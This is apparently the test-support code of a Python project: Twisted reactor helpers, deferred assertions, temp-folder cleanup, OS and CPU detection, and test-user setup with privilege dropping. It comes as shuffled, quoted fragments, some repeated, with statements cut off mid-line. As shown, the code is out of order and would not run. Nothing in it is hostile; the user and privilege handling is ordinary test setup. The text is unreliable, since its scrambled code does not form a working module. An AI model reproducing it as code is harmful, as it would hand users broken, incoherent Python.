LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user)", "elif cls.os_family == 'nt': from wmi import WMI local_wmi =", "import as it will call lsb_release. import ld distro_name =", "os.environ and 'USER' not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user", "os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges", "delayed deferred.\\n' '%s' % (self._reactorQueueToString())) break # Look at writers", "cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path =", "on %r, \" \"found type %r instead: %s\" % (", "if we prevent stop in a previous run. if reactor._started:", "level method. 
In most tests you would like to use", "at most 1 second. if t2 is None or t2", "run one more time to execute the stop code. reactor.iterate()", "if reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks = True continue", "types provided, then this test will fail. @raise SynchronousTestCase.failureException: If", "version. It is not the marketing name. We only support", "if os_name == 'sunos': parts = platform.release().split('.') return 'solaris-%s' %", "test case. \"\"\" success = None for i in range(2,", "bla.bla.tests. is removed. The format is customized for Chevah Nose", "for key in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values, second_values,", "continue to be called and the first failure is raised.", "filesystem for cleaning. if cls._environ_user == cls._drop_user: temp_avatar = SuperAvatar()", "if errors: # noqa:cover self._teardown_errors.append(AssertionError( 'There are temporary files or", "DEFERRED_TIMEOUT = 1 # List of names for delayed calls", "deferred.addBoth(result.append) if not result: self.fail( \"Success result expected on %r,", "False # Set up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError,", "that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a", "a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called", "returns another deferred. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials()", "if not deferred.called: deferred_done = False while not deferred_done: self._iterateTestReactor(debug=debug)", "result. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred =", "%s\\n' u'threadpool threads: %s\\n' u'threadpool working: %s\\n' u'\\n' % (", "not slow down all the tests, we run with a", "else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def getPeakMemoryUsage(cls): \"\"\" Return maximum", "import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration", "TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase,", "len(reactor.threadpool.working) > 0: have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self,", "first, second, msg=msg) @staticmethod def getHostname(): \"\"\" Return the hostname", "not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check for active", "for delayed calls to be executed and will not stop", "KeyError: success = None if success is None: raise AssertionError('Failed", "text_type(reactor.getWriters())) for reader in reactor.getReaders(): excepted = False for reader_type", "case. \"\"\" success = None for i in range(2, 6):", "interval of at most 1 second. if t2 is None", "13.0. result = [] deferred.addBoth(result.append) if not result: self.fail( \"Success", "a success result, or has an unexpected failure result. @return:", "will be removed only at the end of test. Only", "ImportError: # Twisted support is optional. _SocketWaker = None _UnixWaker", "pool. 
# Check for active jobs in thread pool.
if reactor.threadpool:
    if (
        reactor.threadpool.working
        or (reactor.threadpool.q.qsize() > 0)
            ):
        have_callbacks = True
        continue
\"\"\" if", "result = [] def cb(res): result.append(res) return res deferred.addBoth(cb) if", "# When not executed in debug mode, some test will", "deferred is a Failure. The failed deferred is handled by", "drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''): '''Return", "result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return", "timeout) # Don't start the reactor if it is already", "the L{Deferred<twisted.internet.defer.Deferred>} has no result or has a failure result.", "deferred, *expectedExceptionTypes): \"\"\" Return the current failure result of C{deferred}", "\"\"\" Iterate the reactor without stopping it. \"\"\" iterations =", "> 0: have_callbacks = True continue if reactor.threadpool and len(reactor.threadpool.working)", "a failure, the self.fail below will # report it, so", "raise AssertionError('Deferred is not a failure.') def assertIsNotFailure(self, deferred): \"\"\"", "msg=None): \"\"\" Raise an exception if `value` is not an", "underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name == 'nt':", "'Deferred took more than %d to execute.' % timeout) #", "into the reactor. \"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error =", "before running the test case and removed on #: teardown.", "len(reactor.threadCallQueue) > 0: have_callbacks = True continue if reactor.threadpool and", "result = [] deferred.addBoth(result.append) if not result: self.fail( \"Success result", "more delayed calls are scheduled. This will wait for delayed", "result `None` so that the failure will not be raised", "_iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent() if debug:", "to avoid propagating the error into the reactor. \"\"\" self.assertWasCalled(deferred)", "-v or we show the error. \"\"\" class_name = text_type(self.__class__)[8:-2]", "UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the name of", "the # current stack and we don't care about it.", "os.environ and 'USER' not in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if", "usage in kilo bytes. \"\"\" if cls.os_family == 'posix': import", "'PoolThread-twisted.internet.reactor', ] # We assume that hostname does not change", "if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed calls', delayed_str) def _runDeferred(", "Return working thread from pool, or empty when threadpool does", "a result at this point. If the assertion succeeds, then", "run cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def", "int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP reports value in bytes,", "raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters())", "= None @property def _caller_success_member(self): \"\"\" Retrieve the 'success' member", "raise AssertionError('Cleanup errors: %r' % (errors,)) def _isExceptedThread(self, name): \"\"\"", "super filesystem for cleaning. 
# In case we are running the test suite as super user,
# we use the super filesystem for cleaning.
if cls._environ_user == cls._drop_user:
    temp_avatar = SuperAvatar()
else:
    temp_avatar = DefaultAvatar()
temp_filesystem = LocalFilesystem(avatar=temp_avatar)
temp_members = []
def callCleanup(self):
    """
    Call all cleanup methods.

    If a cleanup fails, the next cleanups will continue to be called
    and the first failure is raised.
    """
    for function, args, kwargs in reversed(self.__cleanup__):
        try:
            function(*args, **kwargs)
        except Exception as error:  # noqa:cover
            self._teardown_errors.append(error)
    self.__cleanup__ = []
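# A usage sketch for the stacked-cleanup helpers on this class;
# `release_resource` is an illustrative callable:
def _stacked_cleanup_example(self, release_resource):
    with self.stackedCleanup():
        # Cleanups registered inside the block run when the `with`
        # block exits (exitCleanup), not at test tearDown.
        self.addCleanup(release_resource)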
# Set flag to fake a clean reactor.
reactor._startedBefore = False
reactor._started = False
reactor._justStopped = False
reactor.running = False
# Start running has consumed the startup events, so we need
# to restore them.
reactor.addSystemEventTrigger(
    'during', 'startup', reactor._reallyStartRunning)
# No need to look for other things as we already know that we need
# to wait at least for delayed calls.
if have_callbacks:
    continue
\"\"\" if cls.os_family ==", "L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that the L{Deferred<twisted.internet.defer.Deferred>}", "Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) #", "while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done = deferred.called if self._timeout_reached: raise", "recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case", "started. # This can happen if we prevent stop in", "prevent_stop: # Don't continue with stop procedure. return # Let", "teardown. \"\"\" if reactor is None: return def raise_failure(location, reason):", "exitCleanup(self): \"\"\" To be called at the end of a", "args, kwargs)) def callCleanup(self): \"\"\" Call all cleanup methods. If", "to normal users.''' if cls._drop_user == '-': return os.environ['USERNAME'] =", "called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another L{Deferred<twisted.internet.defer.Deferred>}", "from chained callbacks. result = deferred.result while isinstance(result, Deferred): self._executeDeferred(result,", "True while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False", "have_callbacks = False break if have_callbacks: break if have_callbacks: continue", "calls', delayed_str) def _runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\"", "not find the home folder path. if not process_capabilities.get_home_folder: raise", "not reactor.threadpool: return [] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop())", "AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the name of the", "\"success\" attribute.') return success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper", "True failure = AssertionError( 'Reactor took more than %.2f seconds", "normal tests. \"\"\" if not reactor: return try: reactor.removeAll() except", "os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ and 'USER' not", "exception in name: return True return False def addCleanup(self, function,", "code after upgrading to Twisted 13 result = [] def", "= sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def", "deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a failure result. This means", "', '') raw_name = raw_name.replace('<bound method ', '') return raw_name.split('", "path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod", "= mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase):", "1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self,", "= True for excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks", "== 'aarch64': return 'arm64' if base == 'x86_64': return 'x64'", "# is changed from other source. 
pass

reactor.threadCallQueue = []
for delayed_call in reactor.getDelayedCalls():
    try:
        delayed_call.cancel()
    except (ValueError, AttributeError):
        # AlreadyCancelled and AlreadyCalled are ValueError.
        # Might be canceled from the separate thread.
        # AttributeError can occur when we do multi-threading.
        pass
On Windows it is `nt` followed by the major and minor NT version.
It is not the marketing name. We only support the Windows NT family.
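# A sketch of the Windows branch implementing the rule above, assuming
# platform.version() returns a dotted NT version such as '10.0.19041':
def _nt_version_example():
    parts = platform.version().split('.')
    return 'nt-%s.%s' % (parts[0], parts[1])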
\"\"\" #: User will be created before running", "mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments) checks = [ self.assertTempIsClean, self.assertWorkingFolderIsClean,", "else: return reactor.threadpool.working @classmethod def _cleanReactor(cls): \"\"\" Remove all delayed", "mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def", "created before running the test case and removed on #:", "test case and removed on #: teardown. CREATE_TEST_USER = None", "in first_keys] second_values = [second[key] for key in second_keys] self.assertSequenceEqual(first_keys,", "= [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] #", "only run the reactor once. This is useful if you", "look for other delayed calls. have_callbacks = True break #", "def tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a", "= system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token,", "%s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool threads:", "= [] self.test_segments = None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads", "delayed.func: # Was already called. continue delayed_str = self._getDelayedCallName(delayed) is_exception", "a failure. \"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is", "tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if len(threads) > 1:", "case.''' success_state = None # We search starting with second", "partial thread names to ignore during the tearDown. # No", "\"\"\" Assert that C{deferred} does not have a result at", "return the failure. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials()", "if reactor._started: # noqa:cover # Reactor was not stopped, so", "(2, 7): from unittest2 import TestCase # Shut up you", "msg, list) def _baseAssertEqual(self, first, second, msg=None): \"\"\" Update to", "required to initiate a reactor for testing. \"\"\" self._timeout_reached =", "be raised at reactor shutdown for not being handled. \"\"\"", "deferred is handled by this method, to avoid propagating the", "is customized for Chevah Nose runner. This is only called", "return res deferred.addBoth(cb) if result: # If there is already", "should save a few DNS queries. hostname = _get_hostname() Bunch", "like to use one of the `getDeferredFailure` or `getDeferredResult`. Usage::", "and isinstance(second, text_type) ): # noqa:cover if not msg: msg", "msg: msg = u'First is unicode while second is str", "has consumed the startup events, so we need # to", "to Twisted 13 result = [] deferred.addBoth(result.append) if not result:", "the current failure on the deferred. It transforms an failure", "main thread: %s - %s' % ( thread_name, threads))) super(ChevahTestCase,", "tests that need a dedicated local OS account present. \"\"\"", "assertNoResult(self, deferred): \"\"\" Assert that C{deferred} does not have a", "Return (path, segments) for a new file created in temp", "is handled by this method, to avoid propagating the error", "success = None if success is None: raise AssertionError('Failed to", "not created yet. 
\"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='',", "only at the end of test. Only use this for", "self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager for", "default DNS resolver. \"\"\" return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test", "execute.' % timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\"", "have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False): \"\"\"", "still active threads, ' 'beside the main thread: %s -", "be stopped. \"\"\" if not self._timeout_reached: # Everything fine, disable", "self).assertSequenceEqual( first, second, msg, seq_type) for first_element, second_element in zip(first,", "not self._timeout_reached: # Everything fine, disable timeout. if ( self._reactor_timeout_call", "suite should be started as root and we drop effective", "= '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack", "with super_assertRaises(exception_class) as context: callback(*args, **kwargs) return context.exception def assertSequenceEqual(self,", "deferred): \"\"\" Check that deferred is a failure. \"\"\" if", "we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def skipTest(message=''):", "stack and we don't care about it. for level in", "running threads tests the reactor touched from the test #", "success result (%r) instead\" % (deferred, result[0])) elif (expectedExceptionTypes and", "stackedCleanup(self): \"\"\" Context manager for stacked cleanups. \"\"\" try: self.enterCleanup()", "\"\"\" Call all cleanup methods. If a cleanup fails, the", "else: raise AssertionError('OS not supported.') def folderInTemp(self, *args, **kwargs): \"\"\"", "cleanups will continue to be called and the first failure", "of C{deferred} is left unchanged. Otherwise, any L{failure.Failure} result is", "= mk.credentials() deferred = checker.requestAvatarId(credentials) self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\"", "reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted = True break", "'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that", "(location, reason)) if reactor._started: # noqa:cover # Reactor was not", "reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end of", "and will not stop the reactor. \"\"\" if timeout is", "the assertion succeeds, then the result of C{deferred} is left", "which will be removed only at the end of test.", "the result. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred", "if distro_name in ['centos', 'ol']: # Normalize all RHEL variants.", "not an instance of `expected_type` \"\"\" # In Python 2.7", "left over.\\n %s' % ( '\\n'.join(errors)))) def shortDescription(self): # noqa:cover", "member.find(TEST_NAME_MARKER) == -1: continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if", "Test case for Chevah tests. 
class ChevahTestCase(TwistedTestCase, AssertionMixin):
    """
    Test case for Chevah tests.

    Checks that temporary folder is clean at exit.
    """

    os_name = process_capabilities.os_name
    os_family = process_capabilities.os_family
    os_version = _get_os_version()
    cpu_type = process_capabilities.cpu_type
@classmethod
def cleanTemporaryFolder(cls):
    """
    Clean all test files from temporary folder.

    Return a list of members which were removed.
    """
    return cls._cleanFolder(mk.fs.temp_segments)
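# Sketch of a suite-level sanity check built on the helper above (an
# empty result means the temporary folder was already clean):
def _assert_temp_clean_example():
    leftover = ChevahTestCase.cleanTemporaryFolder()
    assert leftover == [], 'Leftover temp members: %s' % (leftover,)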
\"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path", "delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover # Timeout might be no", "high level integration code, where you don't have the change", "exception wrapped by the failure result is not one of", "a folder in the default temp folder and mark it", "reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check that the reactor has no", "queue. if len(reactor.threadCallQueue) > 0: raise_failure('queued threads', reactor.threadCallQueue) if reactor.threadpool", "\"\"\" Return current Unix timestamp. \"\"\" return time.time() @classmethod def", "break except KeyError: success_state = None if success_state is None:", "%s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value,", "def _runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This is", "reactor until no more delayed calls are scheduled. This will", "\"\"\" cls._drop_user = drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in", "second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements, msg, list) def _baseAssertEqual(self, first,", "result expected on %r, \" \"found failure result instead:\\n%s\" %", "It transforms an failure into result `None` so that the", "tempPathCleanup(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a path", "as we already know that we need # to wait", "Failure. The failed deferred is handled by this method, to", "if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if self._reactor_timeout_failure is not None:", "= platform.processor() if base == 'aarch64': return 'arm64' if base", "if not mk.fs.exists(folder_segments): return [] # In case we are", "reactor._started = False reactor._justStopped = False reactor.running = False #", "len(threads) > 1: for thread in threads: thread_name = thread.getName()", "noqa:cover # Timeout might be no longer be there. pass", "None @property def _caller_success_member(self): \"\"\" Retrieve the 'success' member from", "Failure): self.fail( \"Failure result expected on %r, \" \"found success", "_caller_success_member(self): '''Retrieve the 'success' member from the test case.''' success_state", "cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path)", "len(reactor.getWriters()) > 0: have_callbacks = True continue for reader in", "return \"%s - %s.%s\" % ( self._testMethodName, class_name, self._testMethodName) def", "True if not is_exception: # No need to look for", "mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\"", "Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name():", "msg: msg = u'First is str while second is unicode", "wait at least for delayed calls. if have_callbacks: continue if", "not be used by normal tests. 
\"\"\" if not reactor:", "# noqa:cover # Reactor was not stopped, so stop it", "_environ_user = None _drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp()", "last callback or errback raised an exception or returned a", "a string representation of all delayed calls from reactor queue.", "all the tests, we run with a very small value.", "excepted = False for reader_type in self.EXCEPTED_READERS: if isinstance(reader, reader_type):", "os_name == 'aix': # noqa:cover return 'aix-%s.%s' % (platform.version(), platform.release())", "delayed in reactor.getDelayedCalls(): # We skip our own timeout call.", "os.environ.get('TRAVIS', '').lower() == 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') ==", "while second is unicode for \"%s\".' % ( first,) raise", "empty list when threadpool does not exists. \"\"\" if not", "# removeAll might fail since it detects that internal state", "separate thread. # AttributeError can occur when we do multi-threading.", "return the result. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials()", "is clean at exit. \"\"\" os_name = process_capabilities.os_name os_family =", "finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return a string", "used by normal tests. \"\"\" if not reactor: return try:", "[] for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result)", "Set up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) #", "to initiate a reactor for testing. \"\"\" self._timeout_reached = False", "variants. distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0] return '%s-%s'", "def assertIn(self, target, source): \"\"\" Overwrite stdlib to swap the", "cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user)", "to only run the reactor once. This is useful if", "[] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result def", "FIXME:1370: # Remove / re-route this code after upgrading to", "def assertIsNotFailure(self, deferred): \"\"\" Raise assertion error if deferred is", "Failure): error = deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a", "much better debug output. # Otherwise the debug messages will", "process_capabilities.os_name os_family = process_capabilities.os_family os_version = _get_os_version() cpu_type = process_capabilities.cpu_type", "this code after upgrading to Twisted 13 result = []", "the version. On Windows it is the `nt` followed by", "the 'success' member from the test case.''' success_state = None", "\"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is not a", "that internal state # is changed from other source. 
pass", "self._timeout_reached = True failure = AssertionError( 'Reactor took more than", "\"\"\" if source not in target: message = u'%s not", "6): try: success = inspect.stack()[i][0].f_locals['success'] break except KeyError: success =", "in checks: try: check() except AssertionError as error: errors.append(error.message) if", "reactor = None def _get_hostname(): \"\"\" Return hostname as resolved", "return int(peak_working_set_size) else: raise AssertionError('OS not supported.') def folderInTemp(self, *args,", "continue if run_once: if have_callbacks: raise AssertionError( 'Reactor queue still", "writers. This should only be called at teardown. \"\"\" if", "before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\" Call", "it at the end. \"\"\" iterations = [False] * (count", "cls.os_user.windows_create_local_profile: os_administration.deleteHomeFolder(cls.os_user) os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up", "the reactor will not be stopped. \"\"\" if not self._timeout_reached:", "self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called when start using", "SuperAvatar() else: temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members =", "# FIXME:2099: # Windows XP reports value in bytes, instead", "reactor.getReaders(): excepted = False for reader_type in self.EXCEPTED_READERS: if isinstance(reader,", "%d to execute.' % timeout) # Check executing all deferred", "EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ]", "'solaris-%s' % (parts[1],) if os_name == 'aix': # noqa:cover return", "TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def _get_ci_name(): \"\"\" Return the", "\"\"\" Raise an exception if `value` is not an instance", "is not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self,", "msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments) for", "we can not find the home folder path. if not", "excepted_reader in self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks = False break", "second, msg=msg) @staticmethod def getHostname(): \"\"\" Return the hostname of", "have_callbacks = True continue if reactor.threadpool and len(reactor.threadpool.working) > 0:", "reactor.runUntilCurrent() if debug: # noqa:cover # When debug is enabled", "if timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not", "clean the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase):", "% timeout) # Check executing all deferred from chained callbacks.", "user, # we use super filesystem for cleaning. 
for delayed in reactor.getDelayedCalls(): # We skip", "is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to", "reactor._justStopped = False reactor.running = False # Start running has", "AssertionMixin): \"\"\" Test case for Chevah tests. Checks that temporary", "reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS:", "type %r instead: %s\" % ( expectedString, deferred, result[0].type, result[0].getBriefTraceback().decode(", "for first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self,", "distro_version) def _get_cpu_type(): \"\"\" Return the CPU type as used", "error while executing the reactor. \"\"\" self._timeout_reached = True failure", "reactor._started: # noqa:cover # Reactor was not stopped, so stop", "self.executeReactorUntil( lambda _: time.time() - start > duration, timeout=duration +", "stopping it. \"\"\" iterations = [False] * (count - 1)", "try: delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are", "If the assertion succeeds, then the result of C{deferred} is", "def _cleanReactor(cls): \"\"\" Remove all delayed calls, readers and writers", "This can happen if we prevent stop in a previous", "% ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def", "'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that hostname does not", "will flood the output. print ( u'delayed: %s\\n' u'threads: %s\\n'", "for not being handled. \"\"\" deferred.addErrback(lambda failure: None) def assertIsFailure(self,", "\"\"\" if os.name == 'nt': parts = platform.version().split('.') return 'nt-%s.%s'", "raise AssertionError( \"Expecting type %s, but got %s. %s\" %", "self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False):", "_getDelayedCallName(self, delayed_call): \"\"\" Return a string representation of the delayed", "credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred) self.assertEqual('something',", "# to have a much better debug output. # Otherwise", "def _get_cpu_type(): \"\"\" Return the CPU type as used in", "# noqa:cover result.append(text_type(delayed.func)) return '\\n'.join(result) def _threadPoolQueue(self): \"\"\" Return current", "@raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has no result, has a", "run_once=True to only run the reactor once. This is useful", "reactor. This is only for cleanup purpose and should not", "a path which is not created yet but which will", "== 'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return", "Look at writers buffers: if len(reactor.getWriters()) > 0: have_callbacks =", "not stopped.') # Look at threads queue. if len(reactor.threadCallQueue) >", "script. \"\"\" base = platform.processor() if base == 'aarch64': return", "= self.addCleanup return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\"", "# Check for a clean reactor at shutdown, only if", "is not a deferred.') if timeout is None: timeout =", "if run_once: if have_callbacks: raise AssertionError( 'Reactor queue still contains", "in thread pool. 
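# reactor.threadpool.working lists the threads currently executing a
# job, and a non-empty queue means jobs are still waiting; either case
# keeps the loop spinning via the short time.sleep() below.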
if reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize()", "\"\"\" Return current threads from pool, or empty list when", "nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is", "% (self._reactorQueueToString())) break # Look at writers buffers: if len(reactor.getWriters())", "for a path which is not created yet. \"\"\" return", "raise AssertionError('This is not a deferred.') if timeout is None:", "success_state = None # We search starting with second stack,", "= deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\" Return", "The short description for the test. bla.bla.tests. is removed. The", "in the reactor loop. Starts the reactor, waits for deferred", "failure. \"\"\" if not isinstance(deferred.result, Failure): raise AssertionError('Deferred is not", "msg=msg) @staticmethod def getHostname(): \"\"\" Return the hostname of the", "running the test suite as super user, # we use", "_checkTemporaryFiles(self): \"\"\" Check that no temporary files or folders are", "instead of Kilobytes. return int(peak_working_set_size) else: raise AssertionError('OS not supported.')", "prefix='', suffix=''): \"\"\" Create a new temp folder and return", "drop_user os.environ['DROP_USER'] = drop_user if 'LOGNAME' in os.environ and 'USER'", "result expected on %r, \" \"found success result (%r) instead\"", "return patch.object(*args, **kwargs) def now(self): \"\"\" Return current Unix timestamp.", "'%s' % (self._reactorQueueToString())) break # Look at writers buffers: if", "in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod", "'''Return a SkipTest exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve", "result or has a failure result. @return: The result of", "mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try:", "members which were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls):", "be removed only at the end of test. Only use", "L{failure.Failure} \"\"\" # FIXME:1370: # Remove / re-route this code", "RHEL variants. distro_name = 'rhel' distro_version = ld.version().split('.', 1)[0] return", "but with swapped # 